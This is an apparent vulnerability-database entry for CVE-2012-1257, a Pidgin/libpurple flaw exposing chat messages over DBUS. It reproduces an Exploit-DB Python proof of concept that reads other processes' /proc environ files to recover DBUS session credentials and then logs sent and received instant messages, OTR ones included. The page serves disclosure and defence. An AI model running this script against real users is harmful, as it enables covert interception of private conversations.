CVE-2012-1257
unknown
CVSS v3
—
CVSS v4 NEW
—
VIR risk
1.0
Description
Pidgin 2.10.0 uses DBUS for certain cleartext communication, which allows local users to obtain sensitive information via a dbus session monitor.
Predictions
Exploit likelihood
20%
Patch ETA
—
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.
✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
libpurple 2.8.10 - OTR Information Disclosure
source: https://www.securityfocus.com/bid/52175/info
libpurple is prone to an information-disclosure vulnerability.
Successful exploits may allow attackers to obtain potentially sensitive information that may aid in other attacks.
The following products are vulnerable:
libpurple versions prior to 2.10.1
pidgin versions prior to 2.10.1
pidgin-otr versions prior to 3.2.0
#!/usr/bin/env python
# PoC for snooping on pidgin discussions (OTR/non-OTR) via dbus
# (see CVE-2012-1257)
#
# requires python-dbus and python-gobject
#
# based on sample code found here:
# http://developer.pidgin.im/wiki/DbusHowto
#
# Disclaimer: There's virtually no error handling here,
# so don't rely on this for any serious work.
#
# Author:
# Dimitris Glynos :: { dimitris at census dash labs dot com }
import dbus, gobject, os, sys
from dbus.mainloop.glib import DBusGMainLoop
# same owner processes get to snoop their respective DBUS credentials
# via /proc/<pid>/environ
def obtain_dbus_session_creds():
all_pids = [pid for pid in os.listdir('/proc') if pid.isdigit()]
env_tmpl = '/proc/%s/environ'
session_creds = {}
for pid in all_pids:
if not (os.stat(env_tmpl % pid).st_uid == os.getuid()):
continue
if not os.access(env_tmpl % pid, os.R_OK):
continue
f = open(env_tmpl % pid, 'rb')
contents = f.read()
f.close()
for var in contents.split('\0'):
if var.startswith('DBUS_SESSION_BUS_ADDRESS='):
val = var[var.index('=')+1:]
if not session_creds.has_key(val):
session_creds[val] = 1
return session_creds
def recvs(account, contact, msg, conversation, flags):
print "received '%s' from %s" % (msg, contact)
def sends(account, contact, msg, conversation, flags):
if flags == 1:
print "sent '%s' to %s" % (msg, contact)
if not os.environ.has_key('DBUS_SESSION_BUS_ADDRESS'):
creds = obtain_dbus_session_creds()
if len(creds.keys()) == 0:
print >> sys.stderr, ( "error: no dbus session " +
"credentials could be recovered." )
sys.exit(1)
if len(creds.keys()) > 1:
print >> sys.stderr, ( "error: multiple dbus session " +
"credentials found!\nPlease rerun with the proper "+
"DBUS_SESSION_BUS_ADDRESS env variable\n" +
"Here are the recovered credentials:\n")
for k in creds.keys():
print >> sys.stderr, "DBUS_SESSION_BUS_ADDRESS=%s" % k
sys.exit(1)
os.environ["DBUS_SESSION_BUS_ADDRESS"] = creds.keys()[0]
dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)
bus = dbus.SessionBus()
bus.add_signal_receiver(
recvs,
dbus_interface="im.pidgin.purple.PurpleInterface",
signal_name="ReceivedImMsg"
)
bus.add_signal_receiver(
sends,
dbus_interface="im.pidgin.purple.PurpleInterface",
signal_name="WroteImMsg"
)
mainloop = gobject.MainLoop()
mainloop.run()OS impact
Debian Affected 5 releases
| Version | Status | Fixed in |
|---|---|---|
| trixie | Affected | — |
| sid | Affected | — |
| forky | Affected | — |
| bullseye | Affected | — |
| bookworm | Affected | — |
References
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.